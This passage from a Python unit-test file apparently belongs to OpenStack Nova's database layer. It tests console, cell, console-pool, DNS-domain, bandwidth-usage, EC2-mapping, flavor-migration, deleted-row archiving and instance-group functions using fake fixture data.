consoles_get = db.console_get_all_by_instance(self.ctxt,
uuidutils.generate_uuid())
self.assertEqual(consoles_get, [])
def test_console_delete(self):
console_id = self.consoles[0]['id']
db.console_delete(self.ctxt, console_id)
self.assertRaises(exception.ConsoleNotFound, db.console_get,
self.ctxt, console_id)
def test_console_get_by_pool_instance_not_found(self):
self.assertRaises(exception.ConsoleNotFoundInPoolForInstance,
db.console_get_by_pool_instance, self.ctxt,
self.consoles[0]['pool_id'],
uuidutils.generate_uuid())
def test_console_get_not_found(self):
self.assertRaises(exception.ConsoleNotFound, db.console_get,
self.ctxt, 100500)
def test_console_get_not_found_instance(self):
self.assertRaises(exception.ConsoleNotFoundForInstance, db.console_get,
self.ctxt, self.consoles[0]['id'],
uuidutils.generate_uuid())
class CellTestCase(test.TestCase, ModelsObjectComparatorMixin):
_ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at', 'updated_at']
def setUp(self):
super(CellTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_cell_base_values(self):
return {
'name': 'myname',
'api_url': 'apiurl',
'transport_url': 'transporturl',
'weight_offset': 0.5,
'weight_scale': 1.5,
'is_parent': True,
}
def _cell_value_modify(self, value, step):
if isinstance(value, str):
return value + str(step)
elif isinstance(value, float):
return value + step + 0.6
elif isinstance(value, bool):
return bool(step % 2)
elif isinstance(value, int):
return value + step
def _create_cells(self):
test_values = []
for x in xrange(1, 4):
modified_val = {k: self._cell_value_modify(v, x)
for k, v in self._get_cell_base_values().iteritems()}
db.cell_create(self.ctxt, modified_val)
test_values.append(modified_val)
return test_values
def test_cell_create(self):
cell = db.cell_create(self.ctxt, self._get_cell_base_values())
self.assertIsNotNone(cell['id'])
self._assertEqualObjects(cell, self._get_cell_base_values(),
ignored_keys=self._ignored_keys)
def test_cell_update(self):
db.cell_create(self.ctxt, self._get_cell_base_values())
new_values = {
'api_url': 'apiurl1',
'transport_url': 'transporturl1',
'weight_offset': 0.6,
'weight_scale': 1.6,
'is_parent': False,
}
test_cellname = self._get_cell_base_values()['name']
updated_cell = db.cell_update(self.ctxt, test_cellname, new_values)
self._assertEqualObjects(updated_cell, new_values,
ignored_keys=self._ignored_keys + ['name'])
def test_cell_delete(self):
new_cells = self._create_cells()
for cell in new_cells:
test_cellname = cell['name']
db.cell_delete(self.ctxt, test_cellname)
self.assertRaises(exception.CellNotFound, db.cell_get, self.ctxt,
test_cellname)
def test_cell_get(self):
new_cells = self._create_cells()
for cell in new_cells:
cell_get = db.cell_get(self.ctxt, cell['name'])
self._assertEqualObjects(cell_get, cell,
ignored_keys=self._ignored_keys)
def test_cell_get_all(self):
new_cells = self._create_cells()
cells = db.cell_get_all(self.ctxt)
self.assertEqual(len(new_cells), len(cells))
cells_byname = {newcell['name']: newcell
for newcell in new_cells}
for cell in cells:
self._assertEqualObjects(cell, cells_byname[cell['name']],
self._ignored_keys)
def test_cell_get_not_found(self):
self._create_cells()
self.assertRaises(exception.CellNotFound, db.cell_get, self.ctxt,
'cellnotinbase')
def test_cell_update_not_found(self):
self._create_cells()
self.assertRaises(exception.CellNotFound, db.cell_update, self.ctxt,
'cellnotinbase', self._get_cell_base_values())
def test_cell_create_exists(self):
db.cell_create(self.ctxt, self._get_cell_base_values())
self.assertRaises(exception.CellExists, db.cell_create,
self.ctxt, self._get_cell_base_values())
class ConsolePoolTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(ConsolePoolTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.test_console_pool_1 = {
'address': '192.168.2.10',
'username': 'user_1',
'password': 'secret_123',
'console_type': 'type_1',
'public_hostname': 'public_hostname_123',
'host': 'localhost',
'compute_host': '127.0.0.1',
}
self.test_console_pool_2 = {
'address': '192.168.2.11',
'username': 'user_2',
'password': 'secret_1234',
'console_type': 'type_2',
'public_hostname': 'public_hostname_1234',
'host': '127.0.0.1',
'compute_host': 'localhost',
}
self.test_console_pool_3 = {
'address': '192.168.2.12',
'username': 'user_3',
'password': 'secret_12345',
'console_type': 'type_2',
'public_hostname': 'public_hostname_12345',
'host': '127.0.0.1',
'compute_host': '192.168.1.1',
}
def test_console_pool_create(self):
console_pool = db.console_pool_create(
self.ctxt, self.test_console_pool_1)
self.assertIsNotNone(console_pool.get('id'))
ignored_keys = ['deleted', 'created_at', 'updated_at',
'deleted_at', 'id']
self._assertEqualObjects(
console_pool, self.test_console_pool_1, ignored_keys)
def test_console_pool_create_duplicate(self):
db.console_pool_create(self.ctxt, self.test_console_pool_1)
self.assertRaises(exception.ConsolePoolExists, db.console_pool_create,
self.ctxt, self.test_console_pool_1)
def test_console_pool_get_by_host_type(self):
params = [
self.test_console_pool_1,
self.test_console_pool_2,
]
for p in params:
db.console_pool_create(self.ctxt, p)
ignored_keys = ['deleted', 'created_at', 'updated_at',
'deleted_at', 'id', 'consoles']
cp = self.test_console_pool_1
db_cp = db.console_pool_get_by_host_type(
self.ctxt, cp['compute_host'], cp['host'], cp['console_type']
)
self._assertEqualObjects(cp, db_cp, ignored_keys)
def test_console_pool_get_by_host_type_no_resuls(self):
self.assertRaises(
exception.ConsolePoolNotFoundForHostType,
db.console_pool_get_by_host_type, self.ctxt, 'compute_host',
'host', 'console_type')
def test_console_pool_get_all_by_host_type(self):
params = [
self.test_console_pool_1,
self.test_console_pool_2,
self.test_console_pool_3,
]
for p in params:
db.console_pool_create(self.ctxt, p)
ignored_keys = ['deleted', 'created_at', 'updated_at',
'deleted_at', 'id', 'consoles']
cp = self.test_console_pool_2
db_cp = db.console_pool_get_all_by_host_type(
self.ctxt, cp['host'], cp['console_type'])
self._assertEqualListsOfObjects(
db_cp, [self.test_console_pool_2, self.test_console_pool_3],
ignored_keys)
def test_console_pool_get_all_by_host_type_no_results(self):
res = db.console_pool_get_all_by_host_type(
self.ctxt, 'cp_host', 'cp_console_type')
self.assertEqual([], res)
class DnsdomainTestCase(test.TestCase):
def setUp(self):
super(DnsdomainTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.domain = 'test.domain'
self.testzone = 'testzone'
self.project = 'fake'
def test_dnsdomain_register_for_zone(self):
db.dnsdomain_register_for_zone(self.ctxt, self.domain, self.testzone)
domain = db.dnsdomain_get(self.ctxt, self.domain)
self.assertEqual(domain['domain'], self.domain)
self.assertEqual(domain['availability_zone'], self.testzone)
self.assertEqual(domain['scope'], 'private')
def test_dnsdomain_register_for_project(self):
db.dnsdomain_register_for_project(self.ctxt, self.domain, self.project)
domain = db.dnsdomain_get(self.ctxt, self.domain)
self.assertEqual(domain['domain'], self.domain)
self.assertEqual(domain['project_id'], self.project)
self.assertEqual(domain['scope'], 'public')
def test_dnsdomain_unregister(self):
db.dnsdomain_register_for_zone(self.ctxt, self.domain, self.testzone)
db.dnsdomain_unregister(self.ctxt, self.domain)
domain = db.dnsdomain_get(self.ctxt, self.domain)
self.assertIsNone(domain)
def test_dnsdomain_get_all(self):
d_list = ['test.domain.one', 'test.domain.two']
db.dnsdomain_register_for_zone(self.ctxt, d_list[0], 'zone')
db.dnsdomain_register_for_zone(self.ctxt, d_list[1], 'zone')
db_list = db.dnsdomain_get_all(self.ctxt)
db_domain_list = [d.domain for d in db_list]
self.assertEqual(sorted(d_list), sorted(db_domain_list))
class BwUsageTestCase(test.TestCase, ModelsObjectComparatorMixin):
_ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at', 'updated_at']
def setUp(self):
super(BwUsageTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.useFixture(test.TimeOverride())
def test_bw_usage_get_by_uuids(self):
now = timeutils.utcnow()
start_period = now - datetime.timedelta(seconds=10)
uuid3_refreshed = now - datetime.timedelta(seconds=5)
expected_bw_usages = {
'fake_uuid1': {'uuid': 'fake_uuid1',
'mac': 'fake_mac1',
'start_period': start_period,
'bw_in': 100,
'bw_out': 200,
'last_ctr_in': 12345,
'last_ctr_out': 67890,
'last_refreshed': now},
'fake_uuid2': {'uuid': 'fake_uuid2',
'mac': 'fake_mac2',
'start_period': start_period,
'bw_in': 200,
'bw_out': 300,
'last_ctr_in': 22345,
'last_ctr_out': 77890,
'last_refreshed': now},
'fake_uuid3': {'uuid': 'fake_uuid3',
'mac': 'fake_mac3',
'start_period': start_period,
'bw_in': 400,
'bw_out': 500,
'last_ctr_in': 32345,
'last_ctr_out': 87890,
'last_refreshed': uuid3_refreshed}
}
bw_usages = db.bw_usage_get_by_uuids(self.ctxt,
['fake_uuid1', 'fake_uuid2'], start_period)
# No matches
self.assertEqual(len(bw_usages), 0)
# Add 3 entries
db.bw_usage_update(self.ctxt, 'fake_uuid1',
'fake_mac1', start_period,
100, 200, 12345, 67890)
db.bw_usage_update(self.ctxt, 'fake_uuid2',
'fake_mac2', start_period,
100, 200, 42, 42)
# Test explicit refreshed time
db.bw_usage_update(self.ctxt, 'fake_uuid3',
'fake_mac3', start_period,
400, 500, 32345, 87890,
last_refreshed=uuid3_refreshed)
# Update 2nd entry
db.bw_usage_update(self.ctxt, 'fake_uuid2',
'fake_mac2', start_period,
200, 300, 22345, 77890)
bw_usages = db.bw_usage_get_by_uuids(self.ctxt,
['fake_uuid1', 'fake_uuid2', 'fake_uuid3'], start_period)
self.assertEqual(len(bw_usages), 3)
for usage in bw_usages:
self._assertEqualObjects(expected_bw_usages[usage['uuid']], usage,
ignored_keys=self._ignored_keys)
def test_bw_usage_get(self):
now = timeutils.utcnow()
start_period = now - datetime.timedelta(seconds=10)
expected_bw_usage = {'uuid': 'fake_uuid1',
'mac': 'fake_mac1',
'start_period': start_period,
'bw_in': 100,
'bw_out': 200,
'last_ctr_in': 12345,
'last_ctr_out': 67890,
'last_refreshed': now}
bw_usage = db.bw_usage_get(self.ctxt, 'fake_uuid1', start_period,
'fake_mac1')
self.assertIsNone(bw_usage)
db.bw_usage_update(self.ctxt, 'fake_uuid1',
'fake_mac1', start_period,
100, 200, 12345, 67890)
bw_usage = db.bw_usage_get(self.ctxt, 'fake_uuid1', start_period,
'fake_mac1')
self._assertEqualObjects(bw_usage, expected_bw_usage,
ignored_keys=self._ignored_keys)
class Ec2TestCase(test.TestCase):
def setUp(self):
super(Ec2TestCase, self).setUp()
self.ctxt = context.RequestContext('fake_user', 'fake_project')
def test_ec2_ids_not_found_are_printable(self):
def check_exc_format(method, value):
try:
method(self.ctxt, value)
except exception.NotFound as exc:
self.assertIn(six.text_type(value), six.text_type(exc))
check_exc_format(db.get_instance_uuid_by_ec2_id, 123456)
check_exc_format(db.ec2_snapshot_get_by_ec2_id, 123456)
check_exc_format(db.ec2_snapshot_get_by_uuid, 'fake')
def test_ec2_volume_create(self):
vol = db.ec2_volume_create(self.ctxt, 'fake-uuid')
self.assertIsNotNone(vol['id'])
self.assertEqual(vol['uuid'], 'fake-uuid')
def test_ec2_volume_get_by_id(self):
vol = db.ec2_volume_create(self.ctxt, 'fake-uuid')
vol2 = db.ec2_volume_get_by_id(self.ctxt, vol['id'])
self.assertEqual(vol2['uuid'], vol['uuid'])
def test_ec2_volume_get_by_uuid(self):
vol = db.ec2_volume_create(self.ctxt, 'fake-uuid')
vol2 = db.ec2_volume_get_by_uuid(self.ctxt, vol['uuid'])
self.assertEqual(vol2['id'], vol['id'])
def test_ec2_snapshot_create(self):
snap = db.ec2_snapshot_create(self.ctxt, 'fake-uuid')
self.assertIsNotNone(snap['id'])
self.assertEqual(snap['uuid'], 'fake-uuid')
def test_ec2_snapshot_get_by_ec2_id(self):
snap = db.ec2_snapshot_create(self.ctxt, 'fake-uuid')
snap2 = db.ec2_snapshot_get_by_ec2_id(self.ctxt, snap['id'])
self.assertEqual(snap2['uuid'], 'fake-uuid')
def test_ec2_snapshot_get_by_uuid(self):
snap = db.ec2_snapshot_create(self.ctxt, 'fake-uuid')
snap2 = db.ec2_snapshot_get_by_uuid(self.ctxt, 'fake-uuid')
self.assertEqual(snap['id'], snap2['id'])
def test_ec2_snapshot_get_by_ec2_id_not_found(self):
self.assertRaises(exception.SnapshotNotFound,
db.ec2_snapshot_get_by_ec2_id,
self.ctxt, 123456)
def test_ec2_snapshot_get_by_uuid_not_found(self):
self.assertRaises(exception.SnapshotNotFound,
db.ec2_snapshot_get_by_uuid,
self.ctxt, 'fake-uuid')
def test_ec2_instance_create(self):
inst = db.ec2_instance_create(self.ctxt, 'fake-uuid')
self.assertIsNotNone(inst['id'])
self.assertEqual(inst['uuid'], 'fake-uuid')
def test_ec2_instance_get_by_uuid(self):
inst = db.ec2_instance_create(self.ctxt, 'fake-uuid')
inst2 = db.ec2_instance_get_by_uuid(self.ctxt, 'fake-uuid')
self.assertEqual(inst['id'], inst2['id'])
def test_ec2_instance_get_by_id(self):
inst = db.ec2_instance_create(self.ctxt, 'fake-uuid')
inst2 = db.ec2_instance_get_by_id(self.ctxt, inst['id'])
self.assertEqual(inst['id'], inst2['id'])
def test_ec2_instance_get_by_uuid_not_found(self):
self.assertRaises(exception.InstanceNotFound,
db.ec2_instance_get_by_uuid,
self.ctxt, 'uuid-not-present')
def test_ec2_instance_get_by_id_not_found(self):
self.assertRaises(exception.InstanceNotFound,
db.ec2_instance_get_by_uuid,
self.ctxt, 12345)
def test_get_instance_uuid_by_ec2_id(self):
inst = db.ec2_instance_create(self.ctxt, 'fake-uuid')
inst_uuid = db.get_instance_uuid_by_ec2_id(self.ctxt, inst['id'])
self.assertEqual(inst_uuid, 'fake-uuid')
def test_get_instance_uuid_by_ec2_id_not_found(self):
self.assertRaises(exception.InstanceNotFound,
db.get_instance_uuid_by_ec2_id,
self.ctxt, 100500)
class FlavorMigrationTestCase(test.TestCase):
def test_augment_flavor_to_migrate_no_extra_specs(self):
flavor = objects.Flavor()
db_flavor = {
'extra_specs': {'foo': 'bar'}}
sqlalchemy_api._augment_flavor_to_migrate(flavor, db_flavor)
self.assertTrue(flavor.obj_attr_is_set('extra_specs'))
self.assertEqual(db_flavor['extra_specs'], flavor.extra_specs)
def test_augment_flavor_to_migrate_extra_specs_merge(self):
flavor = objects.Flavor()
flavor.extra_specs = {'foo': '1', 'bar': '2'}
db_flavor = {
'extra_specs': {'bar': '3', 'baz': '4'}
}
sqlalchemy_api._augment_flavor_to_migrate(flavor, db_flavor)
self.assertEqual({'foo': '1', 'bar': '2', 'baz': '4'},
flavor.extra_specs)
@mock.patch('nova.db.sqlalchemy.api._augment_flavor_to_migrate')
def test_augment_flavors_to_migrate(self, mock_augment):
instance = objects.Instance()
instance.flavor = objects.Flavor(flavorid='foo')
instance.old_flavor = None
instance.new_flavor = None
sqlalchemy_api._augment_flavors_to_migrate(instance,
{'foo': 'bar'})
mock_augment.assert_called_once_with(instance.flavor, 'bar')
@mock.patch('nova.db.sqlalchemy.api._augment_flavor_to_migrate')
@mock.patch('nova.db.sqlalchemy.api.flavor_get_by_flavor_id')
def test_augment_flavors_to_migrate_uses_cache(self, mock_get,
mock_augment):
instance = objects.Instance(context=context.get_admin_context())
instance.flavor = objects.Flavor(flavorid='foo')
instance.old_flavor = objects.Flavor(flavorid='foo')
instance.new_flavor = objects.Flavor(flavorid='bar')
flavor_cache = {'bar': 'bar_flavor'}
mock_get.return_value = 'foo_flavor'
sqlalchemy_api._augment_flavors_to_migrate(instance, flavor_cache)
self.assertIn('foo', flavor_cache)
self.assertEqual('foo_flavor', flavor_cache['foo'])
mock_get.assert_called_once_with(instance._context, 'foo', 'yes')
def test_migrate_flavor(self):
ctxt = context.get_admin_context()
flavor = flavors.get_default_flavor()
sysmeta = flavors.save_flavor_info({}, flavor)
db.flavor_extra_specs_update_or_create(ctxt, flavor.flavorid,
{'new_spec': 'foo'})
values = {'uuid': str(stdlib_uuid.uuid4()),
'system_metadata': sysmeta,
'extra': {'flavor': 'foobar'},
}
db.instance_create(ctxt, values)
values = {'uuid': str(stdlib_uuid.uuid4()),
'system_metadata': sysmeta,
'extra': {'flavor': None},
}
instance = db.instance_create(ctxt, values)
match, done = db.migrate_flavor_data(ctxt, None, {})
self.assertEqual(1, match)
self.assertEqual(1, done)
extra = db.instance_extra_get_by_instance_uuid(ctxt, instance['uuid'],
columns=['flavor'])
flavorinfo = jsonutils.loads(extra.flavor)
self.assertIsNone(flavorinfo['old'])
self.assertIsNone(flavorinfo['new'])
curflavor = obj_base.NovaObject.obj_from_primitive(flavorinfo['cur'])
self.assertEqual(flavor.flavorid, curflavor.flavorid)
def test_migrate_flavor_honors_limit(self):
ctxt = context.get_admin_context()
flavor = flavors.get_default_flavor()
sysmeta = flavors.save_flavor_info({}, flavor)
db.flavor_extra_specs_update_or_create(ctxt, flavor.flavorid,
{'new_spec': 'foo'})
for i in (1, 2, 3, 4, 5):
values = {'uuid': str(stdlib_uuid.uuid4()),
'system_metadata': sysmeta,
'extra': {'flavor': 'foobar'},
}
db.instance_create(ctxt, values)
values = {'uuid': str(stdlib_uuid.uuid4()),
'system_metadata': sysmeta,
'extra': {'flavor': None},
}
db.instance_create(ctxt, values)
match, done = db.migrate_flavor_data(ctxt, 2, {})
self.assertEqual(2, match)
self.assertEqual(2, done)
match, done = db.migrate_flavor_data(ctxt, 1, {})
self.assertEqual(1, match)
self.assertEqual(1, done)
match, done = db.migrate_flavor_data(ctxt, None, {})
self.assertEqual(2, match)
self.assertEqual(2, done)
match, done = db.migrate_flavor_data(ctxt, None, {})
self.assertEqual(0, match)
self.assertEqual(0, done)
def test_migrate_flavor_honors_states(self):
ctxt = context.get_admin_context()
flavor = flavors.get_default_flavor()
sysmeta = flavors.save_flavor_info({}, flavor)
values = {'uuid': str(stdlib_uuid.uuid4()),
'system_metadata': sysmeta,
'extra': {'flavor': None},
}
db.instance_create(ctxt, values)
values = {'uuid': str(stdlib_uuid.uuid4()),
'task_state': task_states.SPAWNING,
'system_metadata': sysmeta,
'extra': {'flavor': None},
}
db.instance_create(ctxt, values)
values = {'uuid': str(stdlib_uuid.uuid4()),
'vm_state': vm_states.RESCUED,
'system_metadata': sysmeta,
'extra': {'flavor': None},
}
db.instance_create(ctxt, values)
values = {'uuid': str(stdlib_uuid.uuid4()),
'vm_state': vm_states.RESIZED,
'system_metadata': sysmeta,
'extra': {'flavor': None},
}
db.instance_create(ctxt, values)
match, done = db.migrate_flavor_data(ctxt, None, {})
self.assertEqual(4, match)
self.assertEqual(1, done)
match, done = db.migrate_flavor_data(ctxt, None, {})
self.assertEqual(3, match)
self.assertEqual(0, done)
class ArchiveTestCase(test.TestCase):
def setUp(self):
super(ArchiveTestCase, self).setUp()
self.context = context.get_admin_context()
self.engine = get_engine()
self.conn = self.engine.connect()
self.instance_id_mappings = sqlalchemyutils.get_table(
self.engine, "instance_id_mappings")
self.shadow_instance_id_mappings = sqlalchemyutils.get_table(
self.engine, "shadow_instance_id_mappings")
self.dns_domains = sqlalchemyutils.get_table(
self.engine, "dns_domains")
self.shadow_dns_domains = sqlalchemyutils.get_table(
self.engine, "shadow_dns_domains")
self.consoles = sqlalchemyutils.get_table(self.engine, "consoles")
self.console_pools = sqlalchemyutils.get_table(
self.engine, "console_pools")
self.shadow_consoles = sqlalchemyutils.get_table(
self.engine, "shadow_consoles")
self.shadow_console_pools = sqlalchemyutils.get_table(
self.engine, "shadow_console_pools")
self.instances = sqlalchemyutils.get_table(self.engine, "instances")
self.shadow_instances = sqlalchemyutils.get_table(
self.engine, "shadow_instances")
self.uuidstrs = []
for unused in range(6):
self.uuidstrs.append(stdlib_uuid.uuid4().hex)
self.ids = []
self.id_tablenames_to_cleanup = set(["console_pools", "consoles"])
self.uuid_tablenames_to_cleanup = set(["instance_id_mappings",
"instances"])
self.domain_tablenames_to_cleanup = set(["dns_domains"])
def test_shadow_tables(self):
metadata = MetaData(bind=self.engine)
metadata.reflect()
for table_name in metadata.tables:
# NOTE(rpodolyaka): migration 209 introduced a few new tables,
# which don't have shadow tables and it's
# completely OK, so we should skip them here
if table_name.startswith("dump_"):
continue
# NOTE(snikitin): migration 266 introduced a new table 'tags',
# which have no shadow table and it's
# completely OK, so we should skip it here
if table_name == 'tags':
continue
if table_name.startswith("shadow_"):
self.assertIn(table_name[7:], metadata.tables)
continue
self.assertTrue(db_utils.check_shadow_table(self.engine,
table_name))
def test_archive_deleted_rows(self):
# Add 6 rows to table
for uuidstr in self.uuidstrs:
ins_stmt = self.instance_id_mappings.insert().values(uuid=uuidstr)
self.conn.execute(ins_stmt)
# Set 4 to deleted
update_statement = self.instance_id_mappings.update().\
where(self.instance_id_mappings.c.uuid.in_(self.uuidstrs[:4]))\
.values(deleted=1)
self.conn.execute(update_statement)
qiim = sql.select([self.instance_id_mappings]).where(self.
instance_id_mappings.c.uuid.in_(self.uuidstrs))
rows = self.conn.execute(qiim).fetchall()
# Verify we have 6 in main
self.assertEqual(len(rows), 6)
qsiim = sql.select([self.shadow_instance_id_mappings]).\
where(self.shadow_instance_id_mappings.c.uuid.in_(
self.uuidstrs))
rows = self.conn.execute(qsiim).fetchall()
# Verify we have 0 in shadow
self.assertEqual(len(rows), 0)
# Archive 2 rows
db.archive_deleted_rows(self.context, max_rows=2)
rows = self.conn.execute(qiim).fetchall()
# Verify we have 4 left in main
self.assertEqual(len(rows), 4)
rows = self.conn.execute(qsiim).fetchall()
# Verify we have 2 in shadow
self.assertEqual(len(rows), 2)
# Archive 2 more rows
db.archive_deleted_rows(self.context, max_rows=2)
rows = self.conn.execute(qiim).fetchall()
# Verify we have 2 left in main
self.assertEqual(len(rows), 2)
rows = self.conn.execute(qsiim).fetchall()
# Verify we have 4 in shadow
self.assertEqual(len(rows), 4)
# Try to archive more, but there are no deleted rows left.
db.archive_deleted_rows(self.context, max_rows=2)
rows = self.conn.execute(qiim).fetchall()
# Verify we still have 2 left in main
self.assertEqual(len(rows), 2)
rows = self.conn.execute(qsiim).fetchall()
# Verify we still have 4 in shadow
self.assertEqual(len(rows), 4)
def test_archive_deleted_rows_for_every_uuid_table(self):
tablenames = []
for model_class in models.__dict__.itervalues():
if hasattr(model_class, "__tablename__"):
tablenames.append(model_class.__tablename__)
tablenames.sort()
for tablename in tablenames:
ret = self._test_archive_deleted_rows_for_one_uuid_table(tablename)
if ret == 0:
self.uuid_tablenames_to_cleanup.add(tablename)
def _test_archive_deleted_rows_for_one_uuid_table(self, tablename):
""":returns: 0 on success, 1 if no uuid column, 2 if insert failed."""
main_table = sqlalchemyutils.get_table(self.engine, tablename)
if not hasattr(main_table.c, "uuid"):
# Not a uuid table, so skip it.
return 1
shadow_table = sqlalchemyutils.get_table(
self.engine, "shadow_" + tablename)
# Add 6 rows to table
for uuidstr in self.uuidstrs:
ins_stmt = main_table.insert().values(uuid=uuidstr)
try:
self.conn.execute(ins_stmt)
except db_exc.DBError:
# This table has constraints that require a table-specific
# insert, so skip it.
return 2
# Set 4 to deleted
update_statement = main_table.update().\
where(main_table.c.uuid.in_(self.uuidstrs[:4]))\
.values(deleted=1)
self.conn.execute(update_statement)
qmt = sql.select([main_table]).where(main_table.c.uuid.in_(
self.uuidstrs))
rows = self.conn.execute(qmt).fetchall()
# Verify we have 6 in main
self.assertEqual(len(rows), 6)
qst = sql.select([shadow_table]).\
where(shadow_table.c.uuid.in_(self.uuidstrs))
rows = self.conn.execute(qst).fetchall()
# Verify we have 0 in shadow
self.assertEqual(len(rows), 0)
# Archive 2 rows
db.archive_deleted_rows_for_table(self.context, tablename, max_rows=2)
# Verify we have 4 left in main
rows = self.conn.execute(qmt).fetchall()
self.assertEqual(len(rows), 4)
# Verify we have 2 in shadow
rows = self.conn.execute(qst).fetchall()
self.assertEqual(len(rows), 2)
# Archive 2 more rows
db.archive_deleted_rows_for_table(self.context, tablename, max_rows=2)
# Verify we have 2 left in main
rows = self.conn.execute(qmt).fetchall()
self.assertEqual(len(rows), 2)
# Verify we have 4 in shadow
rows = self.conn.execute(qst).fetchall()
self.assertEqual(len(rows), 4)
# Try to archive more, but there are no deleted rows left.
db.archive_deleted_rows_for_table(self.context, tablename, max_rows=2)
# Verify we still have 2 left in main
rows = self.conn.execute(qmt).fetchall()
self.assertEqual(len(rows), 2)
# Verify we still have 4 in shadow
rows = self.conn.execute(qst).fetchall()
self.assertEqual(len(rows), 4)
return 0
def test_archive_deleted_rows_no_id_column(self):
uuidstr0 = self.uuidstrs[0]
ins_stmt = self.dns_domains.insert().values(domain=uuidstr0)
self.conn.execute(ins_stmt)
update_statement = self.dns_domains.update().\
where(self.dns_domains.c.domain == uuidstr0).\
values(deleted=True)
self.conn.execute(update_statement)
qdd = sql.select([self.dns_domains], self.dns_domains.c.domain ==
uuidstr0)
rows = self.conn.execute(qdd).fetchall()
self.assertEqual(len(rows), 1)
qsdd = sql.select([self.shadow_dns_domains],
self.shadow_dns_domains.c.domain == uuidstr0)
rows = self.conn.execute(qsdd).fetchall()
self.assertEqual(len(rows), 0)
db.archive_deleted_rows(self.context, max_rows=1)
rows = self.conn.execute(qdd).fetchall()
self.assertEqual(len(rows), 0)
rows = self.conn.execute(qsdd).fetchall()
self.assertEqual(len(rows), 1)
def test_archive_deleted_rows_fk_constraint(self):
# consoles.pool_id depends on console_pools.id
# SQLite doesn't enforce foreign key constraints without a pragma.
dialect = self.engine.url.get_dialect()
if dialect == sqlite.dialect:
# We're seeing issues with foreign key support in SQLite 3.6.20
# SQLAlchemy doesn't support it at all with < SQLite 3.6.19
# It works fine in SQLite 3.7.
# So return early to skip this test if running SQLite < 3.7
import sqlite3
tup = sqlite3.sqlite_version_info
if tup[0] < 3 or (tup[0] == 3 and tup[1] < 7):
self.skipTest(
'sqlite version too old for reliable SQLA foreign_keys')
self.conn.execute("PRAGMA foreign_keys = ON")
ins_stmt = self.console_pools.insert().values(deleted=1)
result = self.conn.execute(ins_stmt)
id1 = result.inserted_primary_key[0]
self.ids.append(id1)
ins_stmt = self.consoles.insert().values(deleted=1,
pool_id=id1)
result = self.conn.execute(ins_stmt)
id2 = result.inserted_primary_key[0]
self.ids.append(id2)
# The first try to archive console_pools should fail, due to FK.
num = db.archive_deleted_rows_for_table(self.context, "console_pools")
self.assertEqual(num, 0)
# Then archiving consoles should work.
num = db.archive_deleted_rows_for_table(self.context, "consoles")
self.assertEqual(num, 1)
# Then archiving console_pools should work.
num = db.archive_deleted_rows_for_table(self.context, "console_pools")
self.assertEqual(num, 1)
def test_archive_deleted_rows_2_tables(self):
# Add 6 rows to each table
for uuidstr in self.uuidstrs:
ins_stmt = self.instance_id_mappings.insert().values(uuid=uuidstr)
self.conn.execute(ins_stmt)
ins_stmt2 = self.instances.insert().values(uuid=uuidstr)
self.conn.execute(ins_stmt2)
# Set 4 of each to deleted
update_statement = self.instance_id_mappings.update().\
where(self.instance_id_mappings.c.uuid.in_(self.uuidstrs[:4]))\
.values(deleted=1)
self.conn.execute(update_statement)
update_statement2 = self.instances.update().\
where(self.instances.c.uuid.in_(self.uuidstrs[:4]))\
.values(deleted=1)
self.conn.execute(update_statement2)
# Verify we have 6 in each main table
qiim = sql.select([self.instance_id_mappings]).where(
self.instance_id_mappings.c.uuid.in_(self.uuidstrs))
rows = self.conn.execute(qiim).fetchall()
self.assertEqual(len(rows), 6)
qi = sql.select([self.instances]).where(self.instances.c.uuid.in_(
self.uuidstrs))
rows = self.conn.execute(qi).fetchall()
self.assertEqual(len(rows), 6)
# Verify we have 0 in each shadow table
qsiim = sql.select([self.shadow_instance_id_mappings]).\
where(self.shadow_instance_id_mappings.c.uuid.in_(
self.uuidstrs))
rows = self.conn.execute(qsiim).fetchall()
self.assertEqual(len(rows), 0)
qsi = sql.select([self.shadow_instances]).\
where(self.shadow_instances.c.uuid.in_(self.uuidstrs))
rows = self.conn.execute(qsi).fetchall()
self.assertEqual(len(rows), 0)
# Archive 7 rows, which should be 4 in one table and 3 in the other.
db.archive_deleted_rows(self.context, max_rows=7)
# Verify we have 5 left in the two main tables combined
iim_rows = self.conn.execute(qiim).fetchall()
i_rows = self.conn.execute(qi).fetchall()
self.assertEqual(len(iim_rows) + len(i_rows), 5)
# Verify we have 7 in the two shadow tables combined.
siim_rows = self.conn.execute(qsiim).fetchall()
si_rows = self.conn.execute(qsi).fetchall()
self.assertEqual(len(siim_rows) + len(si_rows), 7)
# Archive the remaining deleted rows.
db.archive_deleted_rows(self.context, max_rows=1)
# Verify we have 4 total left in both main tables.
iim_rows = self.conn.execute(qiim).fetchall()
i_rows = self.conn.execute(qi).fetchall()
self.assertEqual(len(iim_rows) + len(i_rows), 4)
# Verify we have 8 in shadow
siim_rows = self.conn.execute(qsiim).fetchall()
si_rows = self.conn.execute(qsi).fetchall()
self.assertEqual(len(siim_rows) + len(si_rows), 8)
# Try to archive more, but there are no deleted rows left.
db.archive_deleted_rows(self.context, max_rows=500)
# Verify we have 4 total left in both main tables.
iim_rows = self.conn.execute(qiim).fetchall()
i_rows = self.conn.execute(qi).fetchall()
self.assertEqual(len(iim_rows) + len(i_rows), 4)
# Verify we have 8 in shadow
siim_rows = self.conn.execute(qsiim).fetchall()
si_rows = self.conn.execute(qsi).fetchall()
self.assertEqual(len(siim_rows) + len(si_rows), 8)
class InstanceGroupDBApiTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(InstanceGroupDBApiTestCase, self).setUp()
self.user_id = 'fake_user'
self.project_id = 'fake_project'
self.context = context.RequestContext(self.user_id, self.project_id)
def _get_default_values(self):
return {'name': 'fake_name',
'user_id': self.user_id,
'project_id': self.project_id}
def _create_instance_group(self, context, values, policies=None,
members=None):
return db.instance_group_create(context, values, policies=policies,
members=members)
def test_instance_group_create_no_key(self):
values = self._get_default_values()
result = self._create_instance_group(self.context, values)
ignored_keys = ['id', 'uuid', 'deleted', 'deleted_at', 'updated_at',
'created_at']
self._assertEqualObjects(result, values, ignored_keys)
self.assertTrue(uuidutils.is_uuid_like(result['uuid']))
def test_instance_group_create_with_key(self):
values = self._get_default_values()
values['uuid'] = 'fake_id'
